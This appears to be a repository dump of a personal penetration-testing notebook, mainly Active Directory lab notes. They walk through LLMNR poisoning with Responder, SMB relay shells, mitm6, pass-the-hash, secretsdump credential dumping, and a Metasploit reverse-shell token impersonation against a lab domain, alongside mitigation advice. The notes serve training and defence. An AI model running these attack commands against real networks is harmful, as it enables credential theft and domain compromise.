```
├── .gitbook
│   └── assets
│       └── image.png
├── README.md
├── SUMMARY.md
├── active-directory
│   ├── ad-basics.md
│   ├── cheat-sheet.md
│   └── peh
│       ├── README.md
│       ├── initial-attack-vectors.md
│       ├── post-compromise-attacks.md
│       └── post-compromise-enumeration.md
├── apis
│   ├── apisec.md
│   ├── methodology
│   │   └── README.md
│   ├── resources.md
│   ├── thm.md
│   └── xss-rat.md
├── cloud
│   └── aws
│       ├── README.md
│       └── ctfs.md
├── exploitation
│   ├── exploitation-basics.md
│   └── shells.md
├── information-gathering-reconnaissance
│   └── passive-reconnaissance.md
├── misc
│   ├── containers.md
│   ├── git.md
│   ├── interesting-files.md
│   ├── linux.md
│   ├── networking.md
│   ├── note-taking.md
│   ├── powershell.md
│   ├── python.md
│   ├── todo.md
│   └── tools.md
├── mobile
│   ├── android
│   │   ├── README.md
│   │   ├── methodology.md
│   │   └── support-and-tools.md
│   ├── ios
│   │   ├── README.md
│   │   └── ios-forensics.md
│   ├── linkedin-learning.md
│   └── tcm-mobile
│       ├── README.md
│       └── android.md
├── penetration-testing-methodology
│   ├── 5-stages-of-ethical-hacking.md
│   └── the-cyber-kill-chain.md
├── pentesting-network
│   ├── 110-pop3.md
│   ├── 111-rpcbind.md
│   ├── 11211-memcached.md
│   ├── 135-rpc.md
│   ├── 137-138-139-netbios.md
│   ├── 139-445-smb.md
│   ├── 1433-mssql.md
│   ├── 161-snmp.md
│   ├── 2049-nfs.md
│   ├── 21-ftp.md
│   ├── 22-ssh.md
│   ├── 23-telnet.md
│   ├── 25-smtp.md
│   ├── 27017-27018-27019-mongodb.md
│   ├── 3128-squid.md
│   ├── 3306-mysql.md
│   ├── 3389-rdp.md
│   ├── 3632-distcc.md
│   ├── 389-ldap.md
│   ├── 464-kpasswd.md
│   ├── 53-dns.md
│   ├── 5432-postgresql.md
│   ├── 5900-vnc.md
│   ├── 5984-6984-couchdb.md
│   ├── 5985-winrm.md
│   ├── 6379-redis.md
│   ├── 6667-irc.md
│   ├── 69-tftp.md
│   ├── 79-finger.md
│   ├── 80-443-http-s
│   │   ├── README.md
│   │   ├── drupal.md
│   │   ├── joomla.md
│   │   ├── node.js.md
│   │   ├── phpmyadmin.md
│   │   ├── tomcat.md
│   │   ├── webdav.md
│   │   └── wordpress.md
│   ├── 873-rsync.md
│   ├── 88-kerberos.md
│   └── 9200-9300-elasticsearch.md
├── pentesting-web
│   ├── authentication.md
│   ├── burp-suite.md
│   ├── command-injection
│   │   ├── README.md
│   │   └── portswigger-notes.md
│   ├── directory-traversal.md
│   ├── idor-insecure-direct-object-reference.md
│   ├── jwt-attacks.md
│   ├── nosql-injection.md
│   ├── sqli-sql-injection.md
│   ├── unrestricted-file-upload.md
│   ├── web-testing.md
│   ├── xss-cross-site-scripting
│   │   ├── README.md
│   │   └── portswigger-notes.md
│   └── xxe-xml-external-entity.md
├── phishing
│   ├── phishing-hiddeneye.md
│   └── phishing.md
├── post-exploitation
│   ├── cleanup.md
│   ├── data-exfiltration.md
│   ├── maintaining-access.md
│   ├── passwords.md
│   └── tunneling-and-port-forwarding.md
├── privilege-escalation
│   ├── linux.md
│   └── windows.md
├── scanning-and-enumeration
│   ├── enumeration.md
│   ├── network-scanning.md
│   └── vulnerability-scanning.md
└── wireless
    └── wireless-hacking-101.md
```

--------------------------------------------------------------------------------
/.gitbook/assets/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/H3r1CH/penetration-testing/d561af2bef61a251767b3b9b95059d0b67153c01/.gitbook/assets/image.png

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Page 1

--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
# Table of contents

* [README](README.md)

## Penetration Testing Methodology

* [5 Stages of Ethical Hacking](penetration-testing-methodology/5-stages-of-ethical-hacking.md)
* [The Cyber Kill Chain](penetration-testing-methodology/the-cyber-kill-chain.md)

## Information Gathering (Reconnaissance)

* [Passive Reconnaissance](information-gathering-reconnaissance/passive-reconnaissance.md)

## Scanning & Enumeration

* [Network Scanning](scanning-and-enumeration/network-scanning.md)
* [Vulnerability Scanning](scanning-and-enumeration/vulnerability-scanning.md)
* [Enumeration](scanning-and-enumeration/enumeration.md)

## Pentesting Network

* [21 (FTP)](pentesting-network/21-ftp.md)
* [22 (SSH)](pentesting-network/22-ssh.md)
* [23 (Telnet)](pentesting-network/23-telnet.md)
* [25 (SMTP)](pentesting-network/25-smtp.md)
* [53 (DNS)](pentesting-network/53-dns.md)
* [69 (TFTP)](pentesting-network/69-tftp.md)
* [79 (Finger)](pentesting-network/79-finger.md)
* [80,443 (HTTP/S)](pentesting-network/80-443-http-s/README.md)
  * [Drupal](pentesting-network/80-443-http-s/drupal.md)
  * [Joomla](pentesting-network/80-443-http-s/joomla.md)
  * [Node.js](pentesting-network/80-443-http-s/node.js.md)
  * [phpMyAdmin](pentesting-network/80-443-http-s/phpmyadmin.md)
  * [Tomcat](pentesting-network/80-443-http-s/tomcat.md)
  * [WebDAV](pentesting-network/80-443-http-s/webdav.md)
  * [WordPress](pentesting-network/80-443-http-s/wordpress.md)
* [88 (Kerberos)](pentesting-network/88-kerberos.md)
* [110 (POP3)](pentesting-network/110-pop3.md)
* [111 (Rpcbind)](pentesting-network/111-rpcbind.md)
* [135 (RPC)](pentesting-network/135-rpc.md)
* [137,138,139 (NetBIOS)](pentesting-network/137-138-139-netbios.md)
* [139,445 (SMB)](pentesting-network/139-445-smb.md)
* [161 (SNMP)](pentesting-network/161-snmp.md)
* [389 (LDAP)](pentesting-network/389-ldap.md)
* [464 (kpasswd)](pentesting-network/464-kpasswd.md)
* [873 (rsync)](pentesting-network/873-rsync.md)
* [1433 (MSSQL)](pentesting-network/1433-mssql.md)
* [2049 (NFS)](pentesting-network/2049-nfs.md)
* [3128 (Squid)](pentesting-network/3128-squid.md)
* [3306 (MySQL)](pentesting-network/3306-mysql.md)
* [3389 (RDP)](pentesting-network/3389-rdp.md)
* [3632 (distcc)](pentesting-network/3632-distcc.md)
* [5432 (postgresql)](pentesting-network/5432-postgresql.md)
* [5900 (VNC)](pentesting-network/5900-vnc.md)
* [5984, 6984 (CouchDB)](pentesting-network/5984-6984-couchdb.md)
* [5985 (WinRM)](pentesting-network/5985-winrm.md)
* [6379 (Redis)](pentesting-network/6379-redis.md)
* [6667 (IRC)](pentesting-network/6667-irc.md)
* [9200, 9300 (Elasticsearch)](pentesting-network/9200-9300-elasticsearch.md)
* [11211 (Memcached)](pentesting-network/11211-memcached.md)
* [27017, 27018, 27019 (MongoDB)](pentesting-network/27017-27018-27019-mongodb.md)

## Pentesting Web

* [Burp Suite](pentesting-web/burp-suite.md)
* [Web Testing](pentesting-web/web-testing.md)
* [Authentication](pentesting-web/authentication.md)
* [Command Injection](pentesting-web/command-injection/README.md)
  * [PortSwigger Notes](pentesting-web/command-injection/portswigger-notes.md)
* [Directory Traversal](pentesting-web/directory-traversal.md)
* [IDOR (Insecure Direct Object Reference)](pentesting-web/idor-insecure-direct-object-reference.md)
* [JWT Attacks](pentesting-web/jwt-attacks.md)
* [NoSQL Injection](pentesting-web/nosql-injection.md)
* [SQLi (SQL Injection)](pentesting-web/sqli-sql-injection.md)
* [Unrestricted File Upload](pentesting-web/unrestricted-file-upload.md)
* [XSS (Cross-Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
  * [PortSwigger Notes](pentesting-web/xss-cross-site-scripting/portswigger-notes.md)
* [XXE (XML External Entity)](pentesting-web/xxe-xml-external-entity.md)

## Exploitation

* [Exploitation Basics](exploitation/exploitation-basics.md)
* [Shells](exploitation/shells.md)

## Post Exploitation

* [Passwords](post-exploitation/passwords.md)
* [Data Exfiltration](post-exploitation/data-exfiltration.md)
* [Maintaining Access](post-exploitation/maintaining-access.md)
* [Tunneling and Port Forwarding](post-exploitation/tunneling-and-port-forwarding.md)
* [Cleanup](post-exploitation/cleanup.md)

## Privilege Escalation

* [Linux](privilege-escalation/linux.md)
* [Windows](privilege-escalation/windows.md)

## Active Directory

* [Cheat Sheet](active-directory/cheat-sheet.md)
* [AD Basics](active-directory/ad-basics.md)
* [PEH](active-directory/peh/README.md)
  * [Initial Attack Vectors](active-directory/peh/initial-attack-vectors.md)
  * [Post-Compromise Enumeration](active-directory/peh/post-compromise-enumeration.md)
  * [Post Compromise Attacks](active-directory/peh/post-compromise-attacks.md)

## Mobile

* [LinkedIn Learning](mobile/linkedin-learning.md)
* [Android](mobile/android/README.md)
  * [Methodology](mobile/android/methodology.md)
  * [Support and Tools](mobile/android/support-and-tools.md)
* [iOS](mobile/ios/README.md)
  * [iOS Forensics](mobile/ios/ios-forensics.md)
* [TCM - Mobile](mobile/tcm-mobile/README.md)
  * [Android](mobile/tcm-mobile/android.md)

## Cloud

* [AWS](cloud/aws/README.md)
  * [CTFs](cloud/aws/ctfs.md)

## APIs

* [Methodology](apis/methodology/README.md)
* [APISEC](apis/apisec.md)
* [THM](apis/thm.md)
* [XSS Rat](apis/xss-rat.md)
* [Resources](apis/resources.md)

## Wireless

* [Wireless Hacking 101](wireless/wireless-hacking-101.md)

## Phishing

* [Phishing](phishing/phishing.md)
* [Phishing: HiddenEye](phishing/phishing-hiddeneye.md)

## Misc

* [Note Taking](misc/note-taking.md)
* [Networking](misc/networking.md)
* [Linux](misc/linux.md)
* [PowerShell](misc/powershell.md)
* [Python](misc/python.md)
* [Containers](misc/containers.md)
* [Git](misc/git.md)
* [Tools](misc/tools.md)
* [Interesting Files](misc/interesting-files.md)
* [TODO](misc/todo.md)

--------------------------------------------------------------------------------
/active-directory/ad-basics.md:
--------------------------------------------------------------------------------
# AD Basics

## Domain Controllers

A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain.

* Holds the AD DS data store
* Handles authentication and authorization services
* Replicates updates from other domain controllers in the forest
* Allows admin access to manage domain resources

## AD DS Data Store

The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services.

* Contains the NTDS.dit - a database that contains all of the information of an Active Directory domain controller as well as password hashes for domain users
* Stored by default in `%SystemRoot%\NTDS`
* Accessible only by the domain controller

## Forest

A forest is a collection of one or more domain trees inside of an Active Directory network. It is what categorizes the parts of the network as a whole. The forest consists of:

* Trees - A hierarchy of domains in Active Directory Domain Services
* Domains - Used to group and manage objects
* Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
* Trusts - Allow users to access resources in other domains
* Objects - Users, groups, printers, computers, shares
* Domain Services - DNS Server, LLMNR, IPv6
* Domain Schema - Rules for object creation

## Users + Groups

### Users

There are four main types of users you'll find in an Active Directory network; however, there can be more depending on how a company manages the permissions of its users. The four types of users are:

* Domain Admins - This is the big boss: they control the domains and are the only ones with access to the domain controller.
* Service Accounts (can be Domain Admins) - These are for the most part never used except for service maintenance; they are required by Windows for services such as SQL to pair a service with a service account.
* Local Administrators - These users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller.
* Domain Users - These are your everyday users. They can log in on the machines they have the authorization to access and may have local administrator rights to machines depending on the organization.

### Groups

Groups make it easier to give permissions to users and objects by organizing them into groups with specified permissions. There are two overarching types of Active Directory groups:

* Security Groups - These groups are used to specify permissions for a large number of users
* Distribution Groups - These groups are used to specify email distribution lists. As an attacker these groups are less beneficial to us but can still be beneficial in enumeration

## Trusts + Policies

### Trusts

Trusts are a mechanism in place for users in the network to gain access to other resources in the domain. For the most part, trusts outline the way that the domains inside of a forest communicate with each other; in some environments trusts can be extended out to external domains and even forests in some cases.

There are two types of trusts that determine how the domains communicate.

* Directional - The direction of the trust flows from a trusting domain to a trusted domain
* Transitive - The trust relationship expands beyond just two domains to include other trusted domains

### Policies

They dictate how the server operates and what rules it will and will not follow. You can think of domain policies like domain groups, except instead of permissions they contain rules, and instead of only applying to a group of users, the policies apply to a domain as a whole.

I'll outline just a few of the many policies that are default or you can create in an Active Directory environment:

* Disable Windows Defender - Disables Windows Defender across all machines on the domain
* Digitally Sign Communication (Always) - Can disable or enable SMB signing on the domain controller

## AD DS + Authentication

### Domain Services

They are services that the domain controller provides to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller. Outlined below are the default domain services:

* LDAP - Lightweight Directory Access Protocol; provides communication between applications and directory services
* Certificate Services - Allows the domain controller to create, validate, and revoke public key certificates
* DNS, LLMNR, NBT-NS - Domain Name Services for identifying IP hostnames

### Domain Authentication

The most important part of Active Directory -- as well as the most vulnerable part of Active Directory -- is the authentication protocols set in place. There are two main types of authentication in place for Active Directory: NTLM and Kerberos.

* Kerberos - The default authentication service for Active Directory; uses ticket-granting tickets and service tickets to authenticate users and give users access to other resources across the domain.
* NTLM - Default Windows authentication protocol; uses an encrypted challenge/response protocol

## AD in the Cloud

### Azure AD

Azure acts as the middle man between your physical Active Directory and your users' sign on. This allows for a more secure transaction between domains, making a lot of Active Directory attacks ineffective.

### Cloud Security

The best way to show you how the cloud takes security precautions past what is already provided with a physical network is to show you a comparison with a cloud Active Directory environment:

| **Windows Server AD** | **Azure AD** |
| --------------------- | -------------- |
| LDAP | REST APIs |
| NTLM | OAuth/SAML |
| Kerberos | OpenID |
| OU Tree | Flat Structure |
| Domains and Forests | Tenants |
| Trusts | Guests |

--------------------------------------------------------------------------------
/active-directory/peh/README.md:
--------------------------------------------------------------------------------
# PEH

## Active Directory Overview

### Active Directory Overview

#### What is Active Directory?

* Directory service developed by Microsoft to manage Windows domain networks
* Stores information related to objects, such as Computers, Users, Printers, etc.
* Think about it as a phone book for Windows
* Authenticates using Kerberos tickets
* Non-Windows devices, such as Linux machines, firewalls, etc. can also authenticate to Active Directory via RADIUS or LDAP

#### Why Active Directory?

* Active Directory is the most commonly used identity management service in the world
* 95% of Fortune 1000 companies implement the service in their networks
* Can be exploited without ever attacking patchable exploits
* Instead, we abuse features, trusts, components, and more.

### Physical Active Directory Components

#### Domain Controllers

* A domain controller is a server with the AD DS server role installed that has specifically been promoted to a domain controller. Domain Controllers:
  * Host a copy of the AD DS directory store
  * Provide authentication and authorization services
  * Replicate updates to other domain controllers in the domain and forest
  * Allow administrative access to manage user accounts and network resources

#### AD DS Data Store

* The AD DS data store contains the database files and processes that store and manage directory information for users, services, and applications. The AD DS data store:
  * Consists of the Ntds.dit file
  * Is stored by default in the `%SystemRoot%\NTDS` folder on all domain controllers
  * Is accessible only through the domain controller processes and protocols

### Logical Active Directory Components

#### AD DS Schema

* The AD DS Schema:
  * Defines every type of object that can be stored in the directory
  * Enforces rules regarding object creation and configuration

#### Domains

* Domains are used to group and manage objects in an organization. Domains are:
  * An administrative boundary for applying policies to groups of objects
  * A replication boundary for replicating data between domain controllers
  * An authentication and authorization boundary that provides a way to limit the scope of access to resources

#### Trees

* A domain tree is a hierarchy of domains in AD DS
  * Ex: contoso.com --> emea.contoso.com, na.contoso.com
* All domains in the tree:
  * Share a contiguous namespace with the parent domain
  * Can have additional child domains
  * By default create a two-way transitive trust with other domains

#### Forest

* A forest is a collection of one or more domain trees. Forests:
  * Share a common schema
  * Share a common configuration partition
  * Share a common global catalog to enable searching
  * Enable trusts between all domains in the forest
  * Share the Enterprise Admins and Schema Admins groups

#### Organizational Units (OUs)

* OUs are Active Directory containers that can contain users, groups, computers, and other OUs. OUs are used to:
  * Represent your organization hierarchically and logically
  * Manage a collection of objects in a consistent way
  * Delegate permissions to administer groups of objects
  * Apply policies

#### Trusts

* Trusts provide a mechanism for users to gain access to resources in another domain

| Types of Trusts | Description | Diagram |
| --------------- | --------------------------------------------------------------------------------------------- | ------- |
| Directional | The trust direction flows from the trusting domain to the trusted domain | |
| Transitive | The trust relationship is extended beyond a two-domain trust to include other trusted domains | |

* All domains in a forest trust all other domains in the forest
* Trusts can extend outside the forest

#### Objects

| Object | Description |
| -------------- | ---------------------------------------------------------------------------------------------- |
| User | Enables network resource access for a user |
| InetOrgPerson | Similar to a user account; used for compatibility with other directory services |
| Contacts | Used primarily to assign e-mail addresses to external users; does not enable network access |
| Groups | Used to simplify the administration of access control |
| Computers | Enables authentication and auditing of computer access to resources |
| Printers | Used to simplify the process of locating and connecting to printers |
| Shared folders | Enables users to search for shared folders based on properties |
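The two trust properties described above (directional: access flows from the trusted domain toward the trusting domain's resources; transitive: the relationship chains through other domains, while a non-transitive trust stops at its two endpoints) are easier to reason about with a small model. The following script is an added example and is not part of these notes or of the PEH course material. The contoso.com tree comes from the Trees section above; partner.example and the one-way, non-transitive external trust are constructed for illustration, and the rule that a chain may only continue across transitive hops is the general behaviour the notes describe for forests versus external trusts.

```python
"""Model of Active Directory trust direction and transitivity.

Added example, not part of the original notes. Domain names other than the
contoso.com tree are constructed for illustration.
"""
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Trust:
    trusting: str      # domain that trusts (its resources become accessible)
    trusted: str       # domain whose users are trusted
    transitive: bool   # whether the trust can be chained through


def two_way(a: str, b: str, transitive: bool = True) -> list[Trust]:
    """A two-way trust is simply a pair of one-way trusts."""
    return [Trust(a, b, transitive), Trust(b, a, transitive)]


def forest(parent: str, children: list[str]) -> list[Trust]:
    """Parent-child trusts inside a forest are two-way and transitive by default."""
    trusts: list[Trust] = []
    for child in children:
        trusts += two_way(parent, child)
    return trusts


def accessible_domains(user_domain: str, trusts: list[Trust]) -> set[str]:
    """Domains whose resources a user from `user_domain` can reach.

    Access flows opposite to the trust direction: a user from the trusted
    domain can reach resources in the trusting domain. A non-transitive trust
    grants access only between its two endpoints; walking further is allowed
    only while every hop on the path so far is transitive.
    """
    # index trusts by the trusted side so we can ask "who trusts X?"
    trusting_of: dict[str, list[Trust]] = {}
    for t in trusts:
        trusting_of.setdefault(t.trusted, []).append(t)

    reachable: set[str] = set()
    chainable: set[str] = {user_domain}   # reached via an all-transitive path
    queue = deque([user_domain])
    while queue:
        current = queue.popleft()
        for t in trusting_of.get(current, []):
            reachable.add(t.trusting)
            if t.transitive and t.trusting not in chainable:
                chainable.add(t.trusting)
                queue.append(t.trusting)
    reachable.discard(user_domain)
    return reachable


# constructed scenario: the contoso.com forest from the notes plus a one-way,
# non-transitive external trust where contoso.com trusts partner.example
TRUSTS = forest("contoso.com", ["emea.contoso.com", "na.contoso.com"]) + [
    Trust("contoso.com", "partner.example", transitive=False),
]


def exposure_report(trusts: list[Trust]) -> dict[str, set[str]]:
    """For every domain that appears in a trust, which domains' resources its users reach."""
    domains = {t.trusting for t in trusts} | {t.trusted for t in trusts}
    return {d: accessible_domains(d, trusts) for d in sorted(domains)}


if __name__ == "__main__":
    for domain, reach in exposure_report(TRUSTS).items():
        print(f"{domain:20} -> {sorted(reach)}")
```

Running it shows that a partner.example user reaches only contoso.com (the non-transitive trust does not carry into emea or na), while an emea.contoso.com user reaches every domain in the forest through the transitive parent-child trusts. Flipping the external trust to `transitive=True` is a quick way to see how much of the forest an external trust exposes when it is created transitively.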
95 | -------------------------------------------------------------------------------- /active-directory/peh/initial-attack-vectors.md: -------------------------------------------------------------------------------- 1 | # Initial Attack Vectors 2 | 3 | ## Introduction 4 | 5 | {% embed url="https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa" %} 6 | 7 | ## LLMNR Poisoning Overview 8 | 9 | #### What is LLMNR? 10 | 11 | Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. 12 | 13 | * Used to identify hosts when DNS fails to do so. 14 | * Previously NBT-NS 15 | * Key flaw is that the services utilizes a user's username and NTLMv2 hash when appropriately responded to. 16 | 17 | #### Steps 18 | 19 | 1. Run Responder 20 | 1. `python3 /usr/share/responder/Responder.py -I tun0 -rdw -v` 21 | 2. An Even Occurs 22 | 1. i.e. someone typed in the wrong network drive (DNS failing) 23 | 3. Get the Hashes 24 | 1. Copy from Responder output and place in a text file 25 | 4. Crack the Hashes 26 | 1. `hashcat -m 5600 hashes.txt rockyou.txt` 27 | 28 | ### Capturing NTLMv2 Hashes with Responder 29 | 30 | #### From Kali 31 | 32 | ```bash 33 | kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw 34 | ... 35 | [+] Listening for events... 36 | ``` 37 | 38 | #### From Windows Machine (MARVEL\fcastle) 39 | 40 | Opened file Explorer, and type \\\192.168.1.165 (The Kali IP address on eth0). 41 | 42 | #### From Kali Machine 43 | 44 | Responder grabs the hash from the previous event. 
45 | 46 | ```bash 47 | [SMB] NTLMv2-SSP Client : 192.168.1.157 48 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 49 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:8ab5671e342774e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| [*] Skipping previously captured hash for MARVEL\fcastle 51 | ``` 52 | 53 | ### Password Cracking with Hashcat 54 | 55 | From the hash found in the previous section an attempt to crack it 56 | 57 | ```bash 58 | kali@kali:~/ctf/tcm/peh$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt 59 | ... 60 | :Password1 61 | ``` 62 | 63 | ### LLMNR Poisoning Defense 64 | 65 | #### Mitigation 66 | 67 | The best defense in this case is to disable LLMNR and NBT-NS. 68 | 69 | * To disable LLMNR,... 70 | * To disable NBT-NS,... 71 | 72 | If a company must use or cannot disable LLMNR/NBT-NS, the best course of action is to: 73 | 74 | * Require Network Access Control. 75 | * Require strong user passwords. The more complex and long the password, the harder it is for an attacker to crack the hash. 76 | 77 | ## SMB Relay Attacks Overview 78 | 79 | #### What is SMB Relay? 80 | 81 | Instead of cracking hashes gathered with Responder, we can instead relay those hashes to specific machines and potentially gain access. 82 | 83 | #### Requirements 84 | 85 | * SMB signing must be disabled on the target 86 | * Relayed user credentials must be admin on machine. 87 | 88 | #### Steps 89 | 90 | 1. Run Responder 91 | 1. vim /usr/share/responder/Responder.conf --> Turn Off SMB and HTTP 92 | 2. Run Responder 93 | 1. `kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw` 94 | 3. Set up your relay 95 | 1. `python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf targets.txt -smb2support` 96 | 4. An even occurs 97 | 1. i.e. someone typed in the wrong network drive (DNS failing) 98 | 5. 
Get the hashes 99 | 100 | ### Discovering Hosts with SMB Signing Disabled 101 | 102 | #### From Kali 103 | 104 | ```bash 105 | kali@kali:~/ctf/tcm/peh$ sudo nmap --script=smb2-security-mode.nse -p445 192.168.1.0/24 106 | ... 107 | Host scipr results: 108 | | smb2-security-mode: 109 | | 2.02: 110 | | Message signing enabled but not required 111 | ``` 112 | 113 | ### SMB Relay Attack Demonstration 114 | 115 | After making necessary changes to Responder.conf... 116 | 117 | #### Run Responder 118 | 119 | ```bash 120 | kali@kali:~/ctf/tcm/peh$ sudo responder -I eth0 -rdw 121 | ... 122 | [+] Listening for events... 123 | ``` 124 | 125 | #### Run ntlmrelayx 126 | 127 | ```bash 128 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -tf targets.txt -smb2support 129 | ... 130 | [*] Servers started, waiting for connections 131 | ``` 132 | 133 | #### Trigger Connection 134 | 135 | #### From Target 136 | 137 | Type `\\ATTACKER-IP` in File Explorer 138 | 139 | #### From Kali 140 | 141 | Hashes returned as well as a dumping of local SAM hashes 142 | 143 | ### Getting a Shell 144 | 145 | Instead of running ntlmrelayx like before, the `-i` option to try and get an interactive shell 146 | 147 | ```bash 148 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -tf targets.txt -smb2support -i 149 | ... 150 | [*] Servers started, waiting for connections 151 | ``` 152 | 153 | Run the same action from Trigger Connection section 154 | 155 | In the output it will say where the shell was returned i.e. 
127.0.0.1:11000 156 | 157 | Use netcat to connection to this port 158 | 159 | ```bash 160 | kali@kali:~/ctf/tcm/peh$ nc 127.0.0.1 11000 161 | # help 162 | We are in an SMB shell essentially 163 | # shares 164 | # use C$ 165 | ``` 166 | 167 | ### SMB Relay Attack Defenses 168 | 169 | #### Mitigation 170 | 171 | * Enable SMB Signing on all devices 172 | * Pro: Completely stops the attack 173 | * Con: Can cause performance issues with file copies 174 | * Disable NTLM authentication on network 175 | * Pro: Completely stops the attack 176 | * Con: If Kerberos stops working, Windows defaults back to NTLM 177 | * Account Tiering: 178 | * Pro: Limits domain admins to specific tasks 179 | * Con: Enforcing the policy may be difficult 180 | * Local Admin Restriction: 181 | * Pro: Can prevent a lot of lateral movement 182 | * Con: Potential increase in the amount of service desk tickets 183 | 184 | ### Gaining Shell Access 185 | 186 | Metasploit Walkthrough 187 | 188 | Also Metasploit psexec vs psexec.py, wmiexec.py, smbexec.py 189 | 190 | ## IPv6 Attacks Overview 191 | 192 | ### Installing mitm6 193 | 194 | {% embed url="https://github.com/dirkjanm/mitm6" %} 195 | 196 | ### Setting Up LDAPS 197 | 198 | Walkthrough of setting up LDAPS server on the Windows Server 199 | 200 | ### IPv6 DNS Takeover via mitm6 201 | 202 | #### Run mitm6 203 | 204 | ```bash 205 | kali@kali:~/ctf/tcm/peh$ mitm6 -d marvel.local 206 | ``` 207 | 208 | #### Run ntlmrelayx 209 | 210 | ```bash 211 | kali@kali:~/ctf/tcm/peh$ ntlmrelayx.py -6 -t ldaps// -wh fakewpad.marvel.local -l lootme 212 | ``` 213 | 214 | {% embed url="https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6" %} 215 | 216 | {% embed url="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation" %} 217 | 218 | ### IPv6 Attack Defenses 219 | 220 | #### Mitigation 221 | 222 | 1. IPv6 poisoning abuses the fact that Windows queries for an IPv6 address even in IPv4-only environments. 
If you don't use IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working: 223 | 1. a... 224 | 2. b... 225 | 3. c... 226 | 2. If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service. 227 | 3. Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding. 228 | 4. Consider Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation. 229 | 230 | ### Passback Attacks 231 | 232 | {% embed url="https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack" %} 233 | 234 | ## Other Attack Vectors and Strategies 235 | 236 | ### Strategies 237 | 238 | * Begin the day with mitm6 or Responder 239 | * Run scans to generate traffic 240 | * If scans are taking too long, look for websites in scope (http\_version) 241 | * Look for default credentials on web logins 242 | * Printers 243 | * Jenkins 244 | * Etc. 
245 | * Think outside the box 246 | -------------------------------------------------------------------------------- /active-directory/peh/post-compromise-attacks.md: -------------------------------------------------------------------------------- 1 | # Post Compromise Attacks 2 | 3 | ## Pass the Password Attacks 4 | 5 | #### crackmapexec 6 | 7 | ```bash 8 | kali@kali:~/ctf/tcm/peh$ crackmapexec smb 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 9 | # Dump the SAM hashes 10 | --sam 11 | # Dump the LSA secrets 12 | --lsa 13 | # Dump the NTDS.dit 14 | --ntds 15 | ``` 16 | 17 | #### psexec 18 | 19 | ```bash 20 | kali@kali:~/ctf/tcm/peh$ /usr/share/doc/python3-impacket/examples/psexec.py marvel/fcastle:Password1@192.168.57.142 21 | ``` 22 | 23 | ## Dumping Hashes with secretsdump.py 24 | 25 | #### secretsdump 26 | 27 | ```bash 28 | kali@kali:~/ctf/tcm/peh$ /usr/share/doc/python3-impacket/examples/secretsdump.py marvel/fcastle:Password1@192.168.57.141 29 | ``` 30 | 31 | ## Cracking NTLM Hashes with Hashcat 32 | 33 | #### hashcat 34 | 35 | ```bash 36 | kali@kali:~/ctf/tcm/peh$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt 37 | ``` 38 | 39 | ## Pass the Hash Attacks 40 | 41 | #### crackmapexec 42 | 43 | ```bash 44 | kali@kali:~/ctf/tcm/peh$ crackmapexec smb 192.168.57.0/24 -u "Frank Castle" -H --local-auth 45 | ``` 46 | 47 | ## Pass Attack Mitigations 48 | 49 | Hard to completely prevent, but we can make it more difficult on an attacker: 50 | 51 | * Limit account re-use 52 | * Avoid re-using local admin password 53 | * Disable Guest and Administrator accounts 54 | * Limit who is a local administrator (least privilege) 55 | * Utilize strong passwords 56 | * The longer the better 57 | * Avoid using common words 58 | * Long sentences 59 | * Privilege Access Management (PAM) 60 | * Check out/in sensitive accounts when needed 61 | * Automatically rotate passwords on check out and check in 62 | * Limits pass attacks as hash/password is strong and 
constantly rotated 63 | 64 | ## Token Impersonation 65 | 66 | ### Overview 67 | 68 | #### What are tokens? 69 | 70 | * Temporary keys that allow you to access to a system/network without having to provide credentials each time you access a file. Think cookies for computers. 71 | 72 | #### Two Types 73 | 74 | * Delegate - Created for logging into a machine or using Remote Desktop 75 | * Impersonate - "non-interactive" such as attach a network drive or a domain logon script 76 | 77 | ### Token Impersonation with Incognito 78 | 79 | #### Metasploit 80 | 81 | ```bash 82 | msfconsole 83 | use exploit/windows/smb/psexec 84 | # Set RHOSTS, SMBDomain, SMBPass, and SMBUser; 85 | # set target 2; set payload windows/x64/meterpreter/reverse_tcp; set LHOST 86 | run 87 | # hashdump 88 | # getuid 89 | # sysinfo 90 | load incognito 91 | help 92 | list_tokens -u 93 | impersonate_token marvel\\administrator 94 | shell 95 | whoami 96 | ``` 97 | 98 | ### Mitigation 99 | 100 | #### Strategies 101 | 102 | * Limit user/group token creation permissions 103 | * Account tiering 104 | * Local admin restriction 105 | 106 | ## Kerberoasting 107 | 108 | ### Overview 109 | 110 | 